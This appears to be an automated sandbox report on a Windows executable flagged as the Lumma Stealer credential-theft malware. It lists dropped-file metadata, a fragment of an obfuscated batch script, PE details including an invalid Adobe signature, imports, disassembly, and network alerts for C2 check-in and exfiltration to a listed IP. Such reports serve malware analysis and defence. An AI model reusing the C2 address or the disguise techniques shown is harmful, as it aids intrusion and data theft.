                                                  Preview:Set KiQOKZsoLEOrUiqMhwDWusbGrYTQGELUMbgNr=o..yGztGoqeXmjwfXwjaJpKMyABuS=sbThJbknfNhRnrVVsxCcXKlVrTy..ZuRXNgJEtjC=tmMmySLHQlpiEvWHhXpPa..npVfrpzsQtRY=bXKPkobgPWKzsses..rMkXqDDQOBgn=yfFymJCiXHUSJjkVM..sZJwyNzvxuZvGpPcRxOkRzOZyyd=sdaUeJXmKtlS..rgvoAwLrgcRiAqXkJVqvgytO=xXjdKNpVmOya..ErFeeUAMBIZhqolvbXpHeurmMD=HkqkSTRsWRjephaTgjeKEZm..QVKPnqyfmj=ABbizoRgEkVqzJhPjKTrHMYxXpe..WLXDWzRsRyJBNLURVUdyklSFFpj=CellyYaTharZSVYiqafWRumeS..Set HLSaXMirOOVncPawDCRdhfjLEhUfXvDosodHqVcdSOupjBXAD=v..XlBKsniNJSSyakNuhnLqH=AnnprnedzLiT..XQbYoTiLbqJNYmxJwSPVQK=jocILznuXmE..dPmCiAcenOctZHGaTaYQjMlQNk=sZTLgzJtTBfIcxHFbM..IrNuhFBOCDFJOVrr=EriKdDMQDKD..EiMtvCzESGyNEuAgSB=sdEqxEGamqdKUYzYvSFszKnl..XxuprnYeYktqiamQpTECWkPkotvhp=HSzevlApvCaHWMgXg..yBlRUIeMEUwZeKSFEjG=WgdqvwlggeW..PWiIoQXKqJFFov=HOsoedpDRlpxTnNnCXQl..DlvOgWyjILRq=CmXUUUFzdbYctjjkrHaj..Set rEUxNxtdonaxaVgAIeWFMhMnalJSqFrmNumVrm=q..AroZGwMdYLcFcHIQRve=KkfCcSGjvaboVvtIyNRdn..UflnrubIrGbEOgNFD=cAUFhjJYCqLrELtssZaXOAPNf..LsIPVmlrVXnfeXOtDvXqwLmvXO=FZULudv
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:ASCII text, with very long lines (1840), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):12562
                                                  Entropy (8bit):5.805312300705228
                                                  Encrypted:false
                                                  SSDEEP:96:taFnFM5LjvgSc9uMkVh2sTkXnts9fJXRY2kSMM2bZIdrEKAAVBJYbfGguTakfdVE:MZF0vZJT6ntsH22T2Nltuw7Sd4jowNHf
                                                  MD5:B649C8B485F6B192061AD04A185F03DC
                                                  SHA1:6FB0CC214D6D55D400793C3D085D9EA98C7FBB87
                                                  SHA-256:FEE25A6FCBD1D1BFBECA85E9A97E882D1B4A0BC5A521838F8B6EE1FE6C7370E9
                                                  SHA-512:E12FDC7E64F6B2AD9EF45B01EC7AB87BB1DBA4C29E727517B9690018B2EC699BDD2173CF9EAC8A0F3441C32BA8A952AB8DE2B0BF63C6C47C94F56BA92BF2CBE3
                                                  Malicious:false
                                                  Preview:Set KiQOKZsoLEOrUiqMhwDWusbGrYTQGELUMbgNr=o..yGztGoqeXmjwfXwjaJpKMyABuS=sbThJbknfNhRnrVVsxCcXKlVrTy..ZuRXNgJEtjC=tmMmySLHQlpiEvWHhXpPa..npVfrpzsQtRY=bXKPkobgPWKzsses..rMkXqDDQOBgn=yfFymJCiXHUSJjkVM..sZJwyNzvxuZvGpPcRxOkRzOZyyd=sdaUeJXmKtlS..rgvoAwLrgcRiAqXkJVqvgytO=xXjdKNpVmOya..ErFeeUAMBIZhqolvbXpHeurmMD=HkqkSTRsWRjephaTgjeKEZm..QVKPnqyfmj=ABbizoRgEkVqzJhPjKTrHMYxXpe..WLXDWzRsRyJBNLURVUdyklSFFpj=CellyYaTharZSVYiqafWRumeS..Set HLSaXMirOOVncPawDCRdhfjLEhUfXvDosodHqVcdSOupjBXAD=v..XlBKsniNJSSyakNuhnLqH=AnnprnedzLiT..XQbYoTiLbqJNYmxJwSPVQK=jocILznuXmE..dPmCiAcenOctZHGaTaYQjMlQNk=sZTLgzJtTBfIcxHFbM..IrNuhFBOCDFJOVrr=EriKdDMQDKD..EiMtvCzESGyNEuAgSB=sdEqxEGamqdKUYzYvSFszKnl..XxuprnYeYktqiamQpTECWkPkotvhp=HSzevlApvCaHWMgXg..yBlRUIeMEUwZeKSFEjG=WgdqvwlggeW..PWiIoQXKqJFFov=HOsoedpDRlpxTnNnCXQl..DlvOgWyjILRq=CmXUUUFzdbYctjjkrHaj..Set rEUxNxtdonaxaVgAIeWFMhMnalJSqFrmNumVrm=q..AroZGwMdYLcFcHIQRve=KkfCcSGjvaboVvtIyNRdn..UflnrubIrGbEOgNFD=cAUFhjJYCqLrELtssZaXOAPNf..LsIPVmlrVXnfeXOtDvXqwLmvXO=FZULudv
                                                  Process:C:\Users\user\Desktop\80441fcf.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):286720
                                                  Entropy (8bit):6.3259145507467816
                                                  Encrypted:false
                                                  SSDEEP:6144:AB+xHFq9O0lHPOGUWLhxjRYmFqZvEAOz04pmdVq:AB+X0lHPOGNnlMZce4wdVq
                                                  MD5:12073C3269A07BF6BC9CD8B66462FC0F
                                                  SHA1:F3A762EF9933B82AEAE112B09A231F140ED2363F
                                                  SHA-256:12221E02174A5148DD215E1B1DCC81E47704BE82E8DBC4E93EB9A664E582CBDA
                                                  SHA-512:E0C586EBB4B18A45345E293189FF52E83D974F52A76C0CD614AC28C6D50288E84F78FC28ADEEB0D10ADF3BAE0A21789E59698E86A96012C2901A32406ACEB206
                                                  Malicious:false
                                                  Preview:....^3.]...U..E..@....x..u....x..t.V.u.........&..F.....^3.]...U..QQ.E.SVW.@..0.~..u..6.}.........'.3.C.._.......tA.~..u;.j....z?...E...U..m..]..E..]..L....E.......D{....~...._..._^3.[....U..E..@....y..u....y..VWu...@..P..H.I...t.3.G..3..u....4....>3._.F.....^]...U..QQ.E.SVW.@..0.~..u..6.}.........'.3.C.._........tF9^.t5.~..t/.....>...E...U..m..]..E..]..z....E.......Dz........_..._^3.[....U..E..@....x..u....x..t.V.u....z....&..F.....^3.]...U..E..@....y..u....e.....u.V.u....B....&..F.....^3.]...U..E..@....x..u....x..t.V.u.........&..F.....^3.]...U..E..@....x..u....x..t.V.u.........&..F.....^3.]...U..QQ.E.V.@....o...QQ..$.....u.......]......E.3....F.....^....U..QQSV.u.3.CW.N...9X.u@.I.9Y.u8.O.....t/.N..1.I..>.......5.......u.....9....^..>.....V..........tR.J.......tF......t=.N....I..............VWRP.;...}............G......7._..?.F..H..0.}...QQ..$...q...QQ..$.\....u.......]......E....F....._^3.[....U..E.VW.@.....=...u......i....>3._.F.....^]...U....S.].VW...E
                                                  File type:PE32 executable (console) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.928729653791834
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:80441fcf.exe
                                                  File size:949'700 bytes
                                                  MD5:d3c1c1a07fc43292e7e29e57c752d4c5
                                                  SHA1:378c2bf9ece8f5db60f56fda569d24c413d64b55
                                                  SHA256:80441fcf20760b653d36c4bc78c58c9e05b190e811767c7ed523a904e53b0684
                                                  SHA512:d16e8e1da988314de0a130d67fe9f8eacd4c49084ed8e122ad11b2a8e0401fc1e1d1bd48f1cacd9742a447719390d93b5c1d32ef366502553a162740f3978adb
                                                  SSDEEP:12288:SdPEXbCuPYDfFyTxAgY1jggLXKHeH82f3Mp6ot7amxgtxBR3Z2txznbQb0YNDSry:SlEXbCjFjgYlyFW3Mam6txBe91fPQ+Te
                                                  TLSH:3815232279E28035D7630A704D74FEB10AFDF26A0F60E95B13948A560FF9AC3D35A15B
                                                  File Content Preview:MZ`.....................@...............................................!..L.!Require Windows..$W%>=.DPn.DPn.DPn.<.n.DPn./To.DPn./Vo.DPnA,Uo:DPnA,To.DPnA,So.DPn./Qo.DPn.DQn.DPn.-So.DPn.-To.DPn.-Uo"DPn.-.n.DPn.D.n.DPn.-Ro.DPnRich.DPn........PE..L...8..V...
                                                  Icon Hash:b5b06a645278f902
                                                  Entrypoint:0x41aaa5
                                                  Entrypoint Section:.text
                                                  Digitally signed:true
                                                  Imagebase:0x400000
                                                  Subsystem:windows cui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x56C8BD38 [Sat Feb 20 19:23:36 2016 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:6
                                                  OS Version Minor:0
                                                  File Version Major:6
                                                  File Version Minor:0
                                                  Subsystem Version Major:6
                                                  Subsystem Version Minor:0
                                                  Import Hash:2f3a7c5c46373967696674b9a526bbc2
                                                  Signature Valid:false
                                                  Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                  Signature Validation Error:The digital signature of the object did not verify
                                                  Error Number:-2146869232
                                                  Not Before, Not After
                                                  • 03/11/2023 01:00:00 05/11/2025 00:59:59
                                                  Subject Chain
                                                  • CN=Adobe Inc., OU=Acrobat DC, O=Adobe Inc., L=San Jose, S=ca, C=US, SERIALNUMBER=2748129, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
                                                  Version:3
                                                  Thumbprint MD5:464C015DAA50884AB4DD5502E6B164B0
                                                  Thumbprint SHA-1:96B7B1EF175BBA4BDE33A05402134289B28B5BCB
                                                  Thumbprint SHA-256:ABC429325881B54BEC561B7B5A635E0E0AC9C94742F1324EBE5EB9AF6AE0CCC5
                                                  Serial:0D1A340F78D7D000E089FDBAAD6522DF
                                                  Instruction
                                                  call 00007FA4A9610CECh
                                                  jmp 00007FA4A9610479h
                                                  push ebp
                                                  mov ebp, esp
                                                  and dword ptr [004219C0h], 00000000h
                                                  sub esp, 24h
                                                  push ebx
                                                  xor ebx, ebx
                                                  inc ebx
                                                  or dword ptr [00421360h], ebx
                                                  push 0000000Ah
                                                  call 00007FA4A9611006h
                                                  test eax, eax
                                                  je 00007FA4A9610772h
                                                  and dword ptr [ebp-10h], 00000000h
                                                  xor eax, eax
                                                  or dword ptr [00421360h], 02h
                                                  xor ecx, ecx
                                                  push esi
                                                  push edi
                                                  mov dword ptr [004219C0h], ebx
                                                  lea edi, dword ptr [ebp-24h]
                                                  push ebx
                                                  cpuid
                                                  mov esi, ebx
                                                  pop ebx
                                                  mov dword ptr [edi], eax
                                                  mov dword ptr [edi+04h], esi
                                                  mov dword ptr [edi+08h], ecx
                                                  xor ecx, ecx
                                                  mov dword ptr [edi+0Ch], edx
                                                  mov eax, dword ptr [ebp-24h]
                                                  mov edi, dword ptr [ebp-20h]
                                                  mov dword ptr [ebp-0Ch], eax
                                                  xor edi, 756E6547h
                                                  mov eax, dword ptr [ebp-18h]
                                                  xor eax, 49656E69h
                                                  mov dword ptr [ebp-08h], eax
                                                  mov eax, dword ptr [ebp-1Ch]
                                                  xor eax, 6C65746Eh
                                                  mov dword ptr [ebp-04h], eax
                                                  xor eax, eax
                                                  inc eax
                                                  push ebx
                                                  cpuid
                                                  mov esi, ebx
                                                  pop ebx
                                                  lea ebx, dword ptr [ebp-24h]
                                                  mov dword ptr [ebx], eax
                                                  mov eax, dword ptr [ebp-04h]
                                                  or eax, dword ptr [ebp-08h]
                                                  or eax, edi
                                                  mov dword ptr [ebx+04h], esi
                                                  mov dword ptr [ebx+08h], ecx
                                                  mov dword ptr [ebx+0Ch], edx
                                                  jne 00007FA4A9610645h
                                                  mov eax, dword ptr [ebp-24h]
                                                  and eax, 0FFF3FF0h
                                                  cmp eax, 000106C0h
                                                  je 00007FA4A9610625h
                                                  cmp eax, 00020660h
                                                  je 00007FA4A961061Eh
                                                  cmp eax, 00020670h
                                                  je 00007FA4A9610617h
                                                  cmp eax, 00030650h
                                                  je 00007FA4A9610610h
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1f5500x12c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x240000x4dc0.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0xe54240x29a0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x1e9600x54.rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1e9b80x40.rdata
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x1c0000x338.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x1aab00x1ac00e5384716f1aca524e830c82e12bcafddFalse0.6011244158878505data6.645186082569821IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x1c0000x47d20x48003380b6b89ece8b928ff8e68cc2eb3a82False0.4224717881944444data5.446009145501002IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0x210000x2d280x6008486e9afd6dee1f33b06a712cd419456False0.376953125data3.776398346677752IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0x240000x4dc00x4e00804b94d9f52ae619a344351ccb0c9412False0.5765725160256411data6.271203950040357IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0x241a80x171dPNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced1.0018590501943552
                                                  RT_ICON0x258c80x2668Device independent bitmap graphic, 48 x 96 x 32, image size 97920.3668633034987795
                                                  RT_ICON0x27f300x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.6019503546099291
                                                  RT_GROUP_ICON0x283980x30data0.8541666666666666
                                                  RT_VERSION0x283c80x370data0.46136363636363636
                                                  RT_MANIFEST0x287380x309ASCII text0.5353925353925354
                                                  RT_MANIFEST0x28a440x37cXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (832), with CRLF line terminatorsEnglishUnited States0.5022421524663677
                                                  DLLImport
                                                  COMCTL32.dll
                                                  KERNEL32.dllSetLastError, Sleep, CreateThread, GetExitCodeThread, GetLocalTime, SystemTimeToFileTime, GetEnvironmentVariableW, ExpandEnvironmentStringsW, SetCurrentDirectoryW, GetCurrentDirectoryW, CompareFileTime, CreateDirectoryW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetFileAttributesW, RemoveDirectoryW, GetTempPathW, GetSystemTimeAsFileTime, lstrcmpW, lstrcmpiW, lstrlenA, MultiByteToWideChar, WideCharToMultiByte, GetLocaleInfoW, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetSystemDefaultLCID, GetCommandLineW, SetEnvironmentVariableW, CreateFileW, GetDriveTypeW, WriteFile, GetTickCount, GetModuleFileNameW, GetModuleHandleW, LoadLibraryA, GetCurrentThreadId, TerminateThread, SuspendThread, ResumeThread, GetSystemDirectoryW, LoadResource, LockResource, GetProcAddress, MulDiv, FormatMessageW, lstrcpyW, FindResourceA, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, VirtualAlloc, VirtualFree, GetFileSize, ReadFile, SetEndOfFile, SetFilePointer, SetFileTime, GetFileInformationByHandle, WaitForMultipleObjects, InitializeCriticalSection, SetEvent, ResetEvent, CreateEventW, RtlUnwind, RaiseException, EncodePointer, VirtualQuery, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetCurrentProcess, InitializeSListHead, GetCurrentProcessId, QueryPerformanceCounter, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, IsProcessorFeaturePresent, SetFileAttributesW, WaitForSingleObject, GetLastError, CloseHandle, lstrlenW, LocalFree, TerminateProcess
                                                  USER32.dllReleaseDC, GetClientRect, MessageBeep, ClientToScreen, PtInRect, GetWindowLongW, SetWindowLongW, GetWindow, SetWindowsHookExW, UnhookWindowsHookEx, CallNextHookEx, GetWindowDC, CallWindowProcW, DrawIconEx, SystemParametersInfoW, SetFocus, DefWindowProcW, wvsprintfW, MessageBoxA, GetKeyState, GetParent, ScreenToClient, GetDC, DrawTextW, EnableMenuItem, GetSystemMenu, GetSystemMetrics, EnableWindow, LoadIconW, KillTimer, SendMessageW, EndDialog, wsprintfW, GetDlgItem, DialogBoxIndirectParamW, SetWindowPos, ShowWindow, LoadImageW, IsWindow, CharUpperW, SetWindowTextW, GetWindowTextW, GetWindowTextLengthW, SetTimer, GetWindowRect
                                                  GDI32.dllDeleteObject, GetDeviceCaps, SelectObject, GetObjectW, CreateFontIndirectW
                                                  SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetMalloc, ShellExecuteW, SHGetSpecialFolderPathW, ShellExecuteExW, SHGetFileInfoW
                                                  ole32.dllCoCreateInstance, CoInitializeEx
                                                  OLEAUT32.dllSysAllocStringLen, VariantClear
                                                  api-ms-win-crt-convert-l1-1-0.dll_wtol
                                                  api-ms-win-crt-string-l1-1-0.dllwcscmp, strcpy_s, _wcsnicmp, wcsncpy, wcsncmp, strncpy
                                                  api-ms-win-crt-runtime-l1-1-0.dll_configure_narrow_argv, _initialize_narrow_environment, _initialize_onexit_table, abort, _crt_atexit, _cexit, _beginthreadex, _set_app_type, terminate, _get_initial_narrow_environment, _initterm, _initterm_e, exit, _exit, _set_new_handler, __p___argc, __p___argv, _c_exit, _register_thread_local_exe_atexit_callback, _seh_filter_exe, _register_onexit_function, _controlfp_s
                                                  api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, _callnewh, free, malloc, calloc
                                                  api-ms-win-crt-stdio-l1-1-0.dll_set_fmode, __p__commode
                                                  api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                                  api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishUnited States
                                                  TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                  2024-07-24T21:05:21.384801+0200TCP2048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration64747443192.168.2.5172.67.163.54
                                                  2024-07-24T21:05:14.060717+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin49731443192.168.2.5172.67.163.54
                                                  2024-07-24T21:05:15.361117+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin49733443192.168.2.5172.67.163.54
                                                  2024-07-24T21:05:16.915861+0200TCP2048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration49735443192.168.2.5172.67.163.54
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jul 24, 2024 21:05:12.649203062 CEST49731443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:12.649235964 CEST44349731172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:12.649385929 CEST49731443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:12.650464058 CEST49731443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:12.650476933 CEST44349731172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:13.152409077 CEST44349731172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:13.152513981 CEST49731443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:13.154134989 CEST49731443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:13.154145956 CEST44349731172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:13.154392958 CEST44349731172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:13.208822012 CEST49731443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:13.377413988 CEST49731443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:13.377413988 CEST49731443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:13.377582073 CEST44349731172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:14.060735941 CEST44349731172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:14.060832977 CEST44349731172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:14.060899973 CEST49731443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:14.230267048 CEST49731443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:14.230295897 CEST44349731172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:14.230318069 CEST49731443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:14.230324030 CEST44349731172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:14.337238073 CEST49733443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:14.337265015 CEST44349733172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:14.337328911 CEST49733443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:14.337841988 CEST49733443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:14.337852001 CEST44349733172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:14.883960009 CEST44349733172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:14.884094954 CEST49733443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:14.893448114 CEST49733443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:14.893466949 CEST44349733172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:14.893827915 CEST44349733172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:14.895114899 CEST49733443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:14.895143032 CEST49733443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:14.895195007 CEST44349733172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:15.361188889 CEST44349733172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:15.362690926 CEST44349733172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:15.362730026 CEST49733443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:15.362740993 CEST44349733172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:15.365747929 CEST44349733172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:15.365797043 CEST49733443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:15.365808010 CEST44349733172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:15.369223118 CEST44349733172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:15.369254112 CEST44349733172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:15.369259119 CEST49733443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:15.369267941 CEST44349733172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:15.369304895 CEST49733443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:15.372687101 CEST44349733172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:15.376065969 CEST44349733172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:15.376121044 CEST49733443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:15.376133919 CEST44349733172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:15.378516912 CEST44349733172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:15.378565073 CEST49733443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:15.378572941 CEST44349733172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:15.427427053 CEST49733443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:15.459743977 CEST44349733172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:15.460843086 CEST44349733172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:15.460896015 CEST49733443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:15.460993052 CEST49733443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:15.461009026 CEST44349733172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:15.461033106 CEST49733443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:15.461039066 CEST44349733172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:15.682904005 CEST49735443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:15.682941914 CEST44349735172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:15.683023930 CEST49735443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:15.683332920 CEST49735443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:15.683346033 CEST44349735172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:16.178339005 CEST44349735172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:16.178483963 CEST49735443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:16.179778099 CEST49735443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:16.179789066 CEST44349735172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:16.180058002 CEST44349735172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:16.181732893 CEST49735443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:16.181850910 CEST49735443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:16.181875944 CEST44349735172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:16.915829897 CEST44349735172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:16.915921926 CEST44349735172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:16.916049004 CEST49735443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:16.916167021 CEST49735443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:16.916188002 CEST44349735172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:17.158729076 CEST49736443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:17.158776999 CEST44349736172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:17.158901930 CEST49736443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:17.159302950 CEST49736443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:17.159315109 CEST44349736172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:17.632770061 CEST44349736172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:17.632935047 CEST49736443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:17.634124041 CEST49736443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:17.634141922 CEST44349736172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:17.634412050 CEST44349736172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:17.635629892 CEST49736443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:17.635780096 CEST49736443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:17.635812998 CEST44349736172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:17.635874033 CEST49736443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:17.635883093 CEST44349736172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:18.124378920 CEST44349736172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:18.124505997 CEST44349736172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:18.124615908 CEST49736443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:18.124789000 CEST49736443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:18.124806881 CEST44349736172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:18.509542942 CEST64745443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:18.509627104 CEST44364745172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:18.509704113 CEST64745443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:18.510082006 CEST64745443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:18.510108948 CEST44364745172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:19.019655943 CEST44364745172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:19.019759893 CEST64745443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:19.021028042 CEST64745443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:19.021039009 CEST44364745172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:19.021292925 CEST44364745172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:19.022532940 CEST64745443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:19.022707939 CEST64745443192.168.2.5172.67.163.54
                                                  Jul 24, 2024 21:05:19.022741079 CEST44364745172.67.163.54192.168.2.5
                                                  Jul 24, 2024 21:05:19.022803068 CEST64745443192.168.2.5172.67.163.54
